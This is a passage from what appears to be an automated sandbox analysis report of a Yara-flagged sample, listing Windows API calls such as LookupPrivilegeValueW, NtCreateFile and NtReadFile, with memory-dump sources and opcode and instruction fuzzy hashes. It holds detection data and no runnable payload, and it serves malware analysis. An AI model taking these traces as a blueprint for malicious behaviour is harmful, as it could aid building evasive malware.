                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
                                                                    • Instruction ID: 9a823f8c78894249dba104d5ea0f087799ce9c1430a6f2244117b3d31d4b0435
                                                                    • Opcode Fuzzy Hash: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
                                                                    • Instruction Fuzzy Hash: 4B01ADB22042446FDB24DFA5DC89EEB7B68EF84350F14859DF98D5B282C930E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
                                                                    • Instruction ID: ab81e3b6ab6d3b91ce71e5eff0dc86bffa658c17d00b5c940c9f491b72657ba9
                                                                    • Opcode Fuzzy Hash: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
                                                                    • Instruction Fuzzy Hash: 24E0D8BC2442851BDB04EE69E4908E73795FF85354714994EEC9987307C534D8568BB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
                                                                    • Instruction ID: dd81a4506f34eb1dc815d8e525c1c8e650a7b6415f3c6e3ee69276a5238c3cd9
                                                                    • Opcode Fuzzy Hash: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
                                                                    • Instruction Fuzzy Hash: 12E04F31600615BFC324DF65CC85FE33B64AF59790F0545ADF91A9B682C631A601CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
                                                                    • Instruction ID: b01ba6cf3436e3ac7ba59ad1e4c80d6b9cf1e4843ea3370bd1df8a4db748f34e
                                                                    • Opcode Fuzzy Hash: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
                                                                    • Instruction Fuzzy Hash: EDE04FB12002046FDB10DF55DC84EE73769EF88350F018159F90C97281C935E8118BB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ff0b31f32d211fc4f89a296c0d361304c432c8e53f923f36c056c89cd6797a2f
                                                                    • Instruction ID: d6ee82bc64036987f0fe2e1205dd10503a19861e85fc1da308eca2e5bf5c8e4e
                                                                    • Opcode Fuzzy Hash: ff0b31f32d211fc4f89a296c0d361304c432c8e53f923f36c056c89cd6797a2f
                                                                    • Instruction Fuzzy Hash: ABB09B719014C5D5DB11D7754608717794077D1751F56C065D2430785A4778C491F5B6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
                                                                    • Instruction ID: 0ff0364cf6be1368c5f4b291029ae6b5cbfe5ea2986cd3c38f085d2a96d73519
                                                                    • Opcode Fuzzy Hash: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
                                                                    • Instruction Fuzzy Hash: 06021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction ID: f1d44c302487b103660306cd6987bb60b95c699b99aa7ff381766033f9a4755f
                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction Fuzzy Hash: 6E022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                    • Instruction ID: 81da22ee8a1262830e1fa802aaf6d307635ba80eb60c784e357fba9f96808cb3
                                                                    • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                    • Instruction Fuzzy Hash: 6B62E132E046669FCF22CF28C4407AAFBB1BF65355F2986B9CC559B242D371DD898780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7cbfa02c24d095a130844ba7225633ac844f3ea29f37f37dd599dbf61b4fb2e5
                                                                    • Instruction ID: 0abe51e07de5f9ee5cde77f227cce271ff84093ec6bb7822a910cb6cd1b4f160
                                                                    • Opcode Fuzzy Hash: 7cbfa02c24d095a130844ba7225633ac844f3ea29f37f37dd599dbf61b4fb2e5
                                                                    • Instruction Fuzzy Hash: 08F16C706082118BCB24CF19C880ABAB7F5BF98704F15C92EF88ACB251E734DC91DB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                    • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                    • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4669229c4c2fd221c83b08dcddf1c90e2f96f598bb4e593b9bd6fd52119cdd7
                                                                    • Instruction ID: 6f0a034201328c69823dbb6343f9e785e1f46b646f5089bd6324dd13c91a05fa
                                                                    • Opcode Fuzzy Hash: c4669229c4c2fd221c83b08dcddf1c90e2f96f598bb4e593b9bd6fd52119cdd7
                                                                    • Instruction Fuzzy Hash: B5F12531A08701DFDB25DF28C844B7A77E1AF95314F15866DF8999B291E734EC81CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                    • Instruction ID: 1995e3003edd5a41f8032c6181f9d746fc53fb466e18a3b57215824cc4193310
                                                                    • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                    • Instruction Fuzzy Hash: 87D1D4757243168BCB21CF29C5A03AAB7F5AFA5354B288169DC65CB382EB31DCC19770
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a611ed7e70d566fdd985b3be68262e475882e9b7e5b321ba7e928f11ff4ea896
                                                                    • Instruction ID: 641532a6a19a16e4962a3f833a8dcc039f0d6c3e0979ebb9f01482db405a654b
                                                                    • Opcode Fuzzy Hash: a611ed7e70d566fdd985b3be68262e475882e9b7e5b321ba7e928f11ff4ea896
                                                                    • Instruction Fuzzy Hash: DA717F38A00762DBCB24CF59C4806BAF3F1FB49301BA44CAEDA9297640D775ADD0DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6761243c807f8599106f1ff6191d804287885db2ddfde14bc8d2be766b5794b
                                                                    • Instruction ID: 4156fa8b997677385276b44771148257f16ae5edc97a2b716fcf7a3cd11c15bc
                                                                    • Opcode Fuzzy Hash: a6761243c807f8599106f1ff6191d804287885db2ddfde14bc8d2be766b5794b
                                                                    • Instruction Fuzzy Hash: 7E812232848391DFEB05DF78E8966463FB1F746320708068ED9A25B1D2D77424BACF86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                    • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                    • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 660dbcd9d4b525f84ec70345b48c30eb786b97a7a498ec4d560fc54d98703e81
                                                                    • Instruction ID: 9178a6781057fc96b23a6498efdafe696857250051c9cd61765f4f9f700f33a7
                                                                    • Opcode Fuzzy Hash: 660dbcd9d4b525f84ec70345b48c30eb786b97a7a498ec4d560fc54d98703e81
                                                                    • Instruction Fuzzy Hash: 3F5182B3E14A214BD318CE09CC40631B792FFC8312B5B81BEDD199B397CA74E9529A90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3bf46696de6abd3ccb1d8624ddecd45027ed840a9774cc2ce9ff8440a1e8a6b3
                                                                    • Instruction ID: fc1872c2ed11fff5d620cbbd4c11b470343491c460d1f6761d842a8916d4cbe2
                                                                    • Opcode Fuzzy Hash: 3bf46696de6abd3ccb1d8624ddecd45027ed840a9774cc2ce9ff8440a1e8a6b3
                                                                    • Instruction Fuzzy Hash: C1617372818796CFD716CF38DA8A6823FF1F712324748824FD4A2A7496C7782556CF89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5f23f3ef4e9536adeb6d1fa726c58b3e71a5a037e48cd7ce91c95756c6616280
                                                                    • Instruction ID: 2effb8924c9dd17e0618bc84c382394951f7d9fa071f3d71a9a5d1ccc1f19dab
                                                                    • Opcode Fuzzy Hash: 5f23f3ef4e9536adeb6d1fa726c58b3e71a5a037e48cd7ce91c95756c6616280
                                                                    • Instruction Fuzzy Hash: 9A416D33E1002A9BCB18DF68D892979B3E1FB4930575642B9D819FB291DB34AE51CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
                                                                    • Instruction ID: 61cd57d2072392fc7a97888852fd84d8bcbb586f46090e9864607dc025de2440
                                                                    • Opcode Fuzzy Hash: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
                                                                    • Instruction Fuzzy Hash: A831A0116587F14ED31E836D08B9675AEC18E9720174EC2FEDADA6F3F3C0888408D3A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                    • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                    • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
                                                                    • Instruction ID: 361f27f1a81cd2c9f6af134fa7674f1d50b964825dd26805f452c38648ee03c4
                                                                    • Opcode Fuzzy Hash: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
                                                                    • Instruction Fuzzy Hash: 1D4133739187A2CFD719DF38DA9A7813FB1F791320749834ECA9057092C738256ADB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
                                                                    • Instruction ID: b04cdd777b13eb029ad178d631aa259a83c5c41265c149a7b635c52cc29cf17c
                                                                    • Opcode Fuzzy Hash: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
                                                                    • Instruction Fuzzy Hash: DBC08C32D01A080BD6208D6CA9862B0FBB5E757270F40375FE80BE7254894AD4926248
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
                                                                    • Instruction ID: a99fd93fac32b6c5bd72fbc59389829e61a1defbd79046b1edcb9b2863031fe3
                                                                    • Opcode Fuzzy Hash: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
                                                                    • Instruction Fuzzy Hash: 04B0921BA868285500106C5E78800B9E3A4D8CB229E10F3978D1CB32002406C81E80D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
                                                                    • Instruction ID: 6c37e1900271d968a9ebdac2dec6771b5c852c920dd60c45b272dc951f77e813
                                                                    • Opcode Fuzzy Hash: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
                                                                    • Instruction Fuzzy Hash: 6FA0023BF864545464581C8DBC616B6D334D1C307AE243273D71CF3400C007C025115C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b94a4f12482cdb6efdba9c2386846f6c47d639a420c28446a8cbd46aad416873
                                                                    • Instruction ID: 63cca503431c8dd1c8ff9aa18e6ab7e204ccf95cc53cd150c245cbd0df88f728
                                                                    • Opcode Fuzzy Hash: b94a4f12482cdb6efdba9c2386846f6c47d639a420c28446a8cbd46aad416873
                                                                    • Instruction Fuzzy Hash: DE90026130100412D202656944146060009D7D2395FD1C022E1824699D8B658953F172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d8deefdfa6c58fd33f47903432cc1917a6a26a36edbfe1ab7c353d62ebae917
                                                                    • Instruction ID: 1bd9a6f03d0466b76adb689b63e4019c6efc6b18a30758c8feec7e5808e81240
                                                                    • Opcode Fuzzy Hash: 9d8deefdfa6c58fd33f47903432cc1917a6a26a36edbfe1ab7c353d62ebae917
                                                                    • Instruction Fuzzy Hash: 9990026120144452D24066694804B0F410597E2352FD1C029A4556698CCF558855A761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cb6653092890690eccd88d0f0fcc2143785d692337dd2de93896fd92ac096a2
                                                                    • Instruction ID: 1b475124c7f0ab1f77c158d518fcd05bc82513688904ffc89c104b6d9f05a117
                                                                    • Opcode Fuzzy Hash: 6cb6653092890690eccd88d0f0fcc2143785d692337dd2de93896fd92ac096a2
                                                                    • Instruction Fuzzy Hash: 8490027124100412D241756944046060009A7D1391FD1C022A0824698E8B958A56FAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9fbcc4fb523595eca0b2339669c419fa1526b44906ef6c8d1fc07ce817ca3b20
                                                                    • Instruction ID: 99b9b2669607286ce64b2c77ed4fa705ce2b68fb232351180d94e9dce7f3a380
                                                                    • Opcode Fuzzy Hash: 9fbcc4fb523595eca0b2339669c419fa1526b44906ef6c8d1fc07ce817ca3b20
                                                                    • Instruction Fuzzy Hash: 4F90027120140412D20065694808747000597D1352F91C021A5564699E8BA5C891B571
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 854d3753fe2eb3304056b637835a4e69d8c3486208fede35255a82d198eb159b
                                                                    • Instruction ID: fcb9ee078bbb9080dc5e4be5f9d3e6c2d57bac66f51f7fea830f253b79b00e0c
                                                                    • Opcode Fuzzy Hash: 854d3753fe2eb3304056b637835a4e69d8c3486208fede35255a82d198eb159b
                                                                    • Instruction Fuzzy Hash: 7D9002A1601140534640B56948044065015A7E23513D1C131A08546A4C8BA88855E2A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b21107234ae899ec7174343ac59d3d3ccf8639180e0e0e281c3d7c912521fe72
                                                                    • Instruction ID: 3f7536a0e90b538ea54ae7f8a844d5625d5c60f0905c3ee046da6d9f84ee6875
                                                                    • Opcode Fuzzy Hash: b21107234ae899ec7174343ac59d3d3ccf8639180e0e0e281c3d7c912521fe72
                                                                    • Instruction Fuzzy Hash: 4A9002A121100052D20465694404706004597E2351F91C022A2554698CCB698C61A165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21dc198b780cf1b8b108b52993a5fd476e0af149226aee778b33d6071fc36065
                                                                    • Instruction ID: f9d28af493443c89fa83410307c98d55ae1e309b0a67ee7dcdef6422e039bd70
                                                                    • Opcode Fuzzy Hash: 21dc198b780cf1b8b108b52993a5fd476e0af149226aee778b33d6071fc36065
                                                                    • Instruction Fuzzy Hash: 5D9002A120140413D24069694804607000597D1352F91C021A2464699E8F698C51B175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00EB3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EB3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00EB821D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 7d3e24e0d4eef8c530966bdbd8658c79266ce4c26d8e2af8ebc4ddba8dcf1993
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 3FF0B6B2200108ABCB08CF88DC95DEB77EDAF8C754F158248BA0D97241C630E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 00EB82C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
